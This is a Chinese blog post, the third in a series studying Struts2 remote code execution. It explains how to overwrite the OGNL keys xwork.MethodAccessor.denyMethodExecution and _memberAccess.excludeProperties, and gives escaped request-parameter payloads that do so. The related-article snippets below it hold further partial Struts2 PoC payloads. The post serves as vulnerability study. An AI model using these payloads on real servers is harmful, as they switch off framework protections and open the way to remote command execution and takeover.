struts2远程执行漏洞学习(三)

最新推荐文章于 2021-08-10 12:00:05 发布
最新推荐文章于 2021-08-10 12:00:05 发布
阅读量203 收藏
点赞数
分类专栏: struts java hacker 文章标签: java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wcf1987/article/details/84158365
版权
hacker 同时被 3 个专栏收录
53 篇文章 1 订阅
订阅专栏
java
35 篇文章 0 订阅
订阅专栏
struts
7 篇文章 0 订阅
订阅专栏



        这个是终结部分了。

    除了#_memberAccess.allowStaticMethodAccess'是一个关键属性外,'xwork.MethodAccessor.denyMethodExecution’是另一个关键属性,意义如同名字,这个属性决定了是否可以执行方法,只有当这个属性为false时,我们才可以利用ognl自定义变量,调用一些关键的方法 例如FileWriter的append方法。

   

     xwork.MethodAccessor.denyMethodExecution和#_memberAccess.allowStaticMethodAccess'的区别在于#_memberAccess.allowStaticMethodAccess'是一个context中的属性,而xwork.MethodAccessor.denyMethodExecution则是value hashmap中的一项,这就决定了对这个变量的覆盖不同于上一个方法。

如果采用第一种方法去覆盖的话,查看内存中,xwork.MethodAccessor.denyMethodExecution=java.lang.StringXXX大概是个这么个东西

而我们希望的是覆盖完变成

xwork.MethodAccessor.denyMethodExecution=false这样的形式

 

 

解决方案:

&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))

实际上就是

#context['xwork.MethodAccessor.denyMethodExecution']=false

放到了一个ast的树枝中,注意,要放到第三层,才能保证解析正确

 

 

这个是有人给出的解决方案。http://www.tengsu.com/school/top/2011/school_4595_4.html

 

同样他指出了在xwork 2.1.2.jar中存在bug,大家可以看看他的文章,最终他给出了解决思路,就是在不利用静态方法的情况下,想办法覆盖掉 excludeProperties

 


同样这个不能采用和第一个一样的方法覆盖,那样只能得到字符串。应采用和第二个类似的方法覆盖掉

 

我就直接放答案了,大家可以自己试试,这个只有在xwork2.1.2中才必须加上这句,以后版本加了也不算错,不过没什么效果

&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))

wcf1987
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Apache struts2远程命令执行_CVE-2017-9805(S2-052)漏洞复现
WY92139010的博客
07-16 2019
Apache struts2远程命令执行_CVE-2017-9805(S2-052)漏洞复现 一、漏洞概述 Apache Struts2的REST插件存在远程代码执行的高危漏洞,Struts2 REST插件的XStream插件的XStream组件存在反序列化漏洞,使用XStream组件对XML格式的数据包进行反序列化操作时,未对数据内容进行有效验证,存在安全隐患,可被远程攻击。 二...
php strus2 漏洞攻击_Struts2远程命令执行漏洞防范与分析
weixin_39850150的博客
12-21 387
防止Struts远程攻击命令解决方案是:1.对使用struts2框架的jar包打补丁(升级到官方指定的版本)2.或者修改对应jar中的ongl处理逻辑,然后编译打包替换旧的文件。3.可使用安恒信息扫描器检测漏洞,运用安恒信息waf防护漏洞,安全点就只保留字母数字,其它的全部删除即可。接下来我们看看如何利用strus漏洞远程执行命令进行攻击的方式第一种攻击方式:新建一个文件,在文件中写入一下自己的东...
S2-015 远程代码执行漏洞
EC_Carrot的博客
08-10 383
漏洞简介 影响版本: 2.0.0 - 2.3.14.2 详细请看:https://github.com/vulhub/vulhub/blob/master/struts2/s2-015/README.zh-cn.md 漏洞复现 根据vulhub的环境,如name.action页面,在name处传入以下POC即可运行命令: ${#context['xwork.MethodAccessor.denyMethodExecution']=false,#m=#_memberAccess.getClass().getD
Struts 2命令执行漏洞
a65783305的博客
06-29 227
2010年7月9日,安全研究者公布了Struts 2一个远程执行代码的漏洞(CVE-2010-1870),严格来说,这其实是XWork的漏洞,因为Struts 2的核心使用的是WebWork,而WebWork又是使用XWork来处理action的。 这个漏洞的细节描述公布在exploit-db 上。 在这里简单摘述如下: XWork通过getters/setters...
S2-009 远程代码执行漏洞
锋刃科技的博客
06-28 513
影响版本 2.1.0 - 2.3.1.1 环境搭建 cd vulhub/struts2/s2-009 docker-compose build && docker-compose up -d 访问http://your-ip:8080/ajax/example5.action http://yourIP:8080/ajax/example5.action 漏洞复现 http://yourIP:8080/ajax/example5.action?age=12313&amp
Struts2远程执行漏洞 Jar包集合体
08-26
然而,随着时间的推移,Struts2框架发现了一系列的安全漏洞,这些漏洞可能导致远程代码执行(RCE)风险,使攻击者能够完全控制受影响的服务器。在给定的标题和描述中,提到了几个关键的Struts2漏洞,包括S2-057、S2-...
Struts2远程命令执行验证工具
11-22
1. **快速检测**:该工具能够迅速扫描并检测出是否存在Struts2远程命令执行漏洞,节省了手动检查的时间和精力。 2. **批量导入验证**:对于大型网络环境,支持批量导入多个目标URL,进行批量检测,提高了工作效率。...
Struts2远程命令执行漏洞解析
01-06
Struts2远程命令执行漏洞解析 漏洞解析 远程命令 Struts2
Struts2远程代码执行漏洞分析(S2-013)1
08-08
Struts2 远程代码执行漏洞分析(S2-013) Struts2 是 Apache 官方的产品,最近出了一个远程代码执行漏洞,编号“S2-013”,目前是 0DAY,官方没有修补方案出现。这个漏洞出现在 includeParams 属性中,允许远程命令...
STRUTS2的getClassLoader漏洞利用
01-30
引用《Springframework(cve-2010-1622)漏洞利用指南》:Struts2其实也本该是个导致远程代码执行漏洞才对,只是因为它的字段映射问题,只映射基础类型,默认不负责映射其他类型,所以当攻击者直接提交URLs[0]
struts2之远程执行
..7a.
10-19 2621
Struts2的核心是使用的webwork框架,而webwork又是使用的XWork来处理action的,并且通过调用底层的getter/setter方法来处理http的参数,它将每个http参数声明为一个ONGL(这里是ONGL的介绍)语句。当我们提交一个http参数: user.address.city=Bishkek&user['favoriteDrink']=kumys ONGL将它转
struts2漏洞学习总结
bcbobo21cn的专栏
06-24 2165
struts2安全漏洞 Struts2是apache项目下的一个web 框架,普遍应用于阿里巴巴、京东等互联网、政府、企业门户网站。 目录 1 背景 2 内容 3 造成的影响: 4 应对措施: 背景 Struts2是apache项目下的一个web 框架,普遍应用于阿里巴巴、京东等互联网、政府、企业门户网站。 内容 在2013年6月底发布的Struts 2.3.15版本被曝出存在
Struts2远程命令执行漏洞分析及防范
dongsheng186的专栏
04-10 687
    Struts 2是在struts 和WebWork的技术基础上进行了合并的全新的框架。其全新的Struts 2的体系结构与Struts 1的体系结构的差别巨大。Struts 2以WebWork为核心,采用拦截器的机制来处理用户的请求,这样的设计也使得业务逻辑控制器能够与Servlet API完全脱离开,所以Struts 2可以理解为WebWork的更新产品.   近期Stru
墨者学院-Apache Struts2远程代码执行漏洞(S2-013)复现
JimWu的博客
09-04 1850
Apache Struts2远程代码执行漏洞(S2-013)复现 难易程度:★ 题目类型:命令执行 使用工具:FireFox浏览器、burpsuite 漏洞原理: s:url和s:a标记都提供includeparams属性。该属性的主要作用域是了解包含或不包含http://request参数的内容。INCLUDEParams的允许值为:none-在URL中不包含任何参数(默认),get-仅在URL...
java 2mi远程执行漏洞_Struts2 5个远程代码执行漏洞利用POC
weixin_28822657的博客
02-27 430
标 题: Struts2 5个远程代码执行漏洞利用POC作 者: 园长链 接: http://my.oschina.net/backtract/blog/133638利用代码: 检测是否存在:POC1:http://127.0.0.1/Struts2/test.action?('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)((...
Struts2-016命令执行漏洞
MX的博客
05-05 7508
Struts2-016命令执行漏洞 一:前言 CVE-2013-2251 漏洞概述: Struts2 是第二代基于Model-View-Controller (MVC)模型的java企业级web应用框架。它是WebWork和Struts社区合并后的产物。Apache Struts2的action:、redirect:和redirectAction:前缀参数在实现其功能的过程中使用了Ognl表达式,...
struts2对Ognl的封装--MethodAccessor
java12345678
03-21 241
Ognl 中MethodAccessor 用于调用类实例的方法或类的静态方法    Struts 加载扩展的PropertyAccessor  :             Struts 中在OgnlValueStackFactory中调用OgnlRuntime.setMethodAccessor(Class class,MethodAccessor  实例)方法来加载Struts中定义的M...
墨者学院-Apache Struts2远程代码执行漏洞(S2-015)复现
JimWu的博客
09-04 2000
Apache Struts2远程代码执行漏洞(S2-015)复现 难易程度:★★ 题目类型:命令执行 使用工具:FireFox浏览器 漏洞原理: 如果一个请求与任何其他定义的操作不匹配,它将被匹配,*并且所请求的操作名称将用于以操作名称加载JSP文件。并且,1作为OGNL表达式的威胁值,{ }可以在服务器端执行任意的Java代码。 1.打开靶场,测试是否存在漏洞。 输入/${1+1}.action...
s2-016远程代码执行漏洞
Stephen Wolf
11-19 902
一、漏洞描述: 在struts2中,DefaultActionMapper类支持以"action:"、"redirect:"、"redirectAction:"作为导航或是重定向前缀,但是这些前缀后面同时可以跟OGNL表达式,由于struts2没有对这些前缀做过滤,导致利用OGNL表达式调用java静态方法执行任意系统命令。 影响版本 2.0.0 - 2.3...
S2-052远程代码执行漏洞
最新发布
07-27
S2-052远程代码执行漏洞是Apache Struts 2框架中的一个安全漏洞,影响版本为2.0.0至2.5.12。该漏洞允许攻击者通过构造恶意的OGNL(Object-Graph Navigation Language)表达式,远程执行任意代码。 攻击者可以通过发送恶意的HTTP请求,利用漏洞执行任意的代码,可能导致服务器被完全控制。此漏洞的危害性较高,因此建议尽快升级到修复该漏洞的版本,或者应用相关的安全补丁。 如果你是开发者或系统管理员,请确保你的应用程序使用的是修复了该漏洞的Apache Struts 2版本,并及时关注相关安全公告以保持系统的安全性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值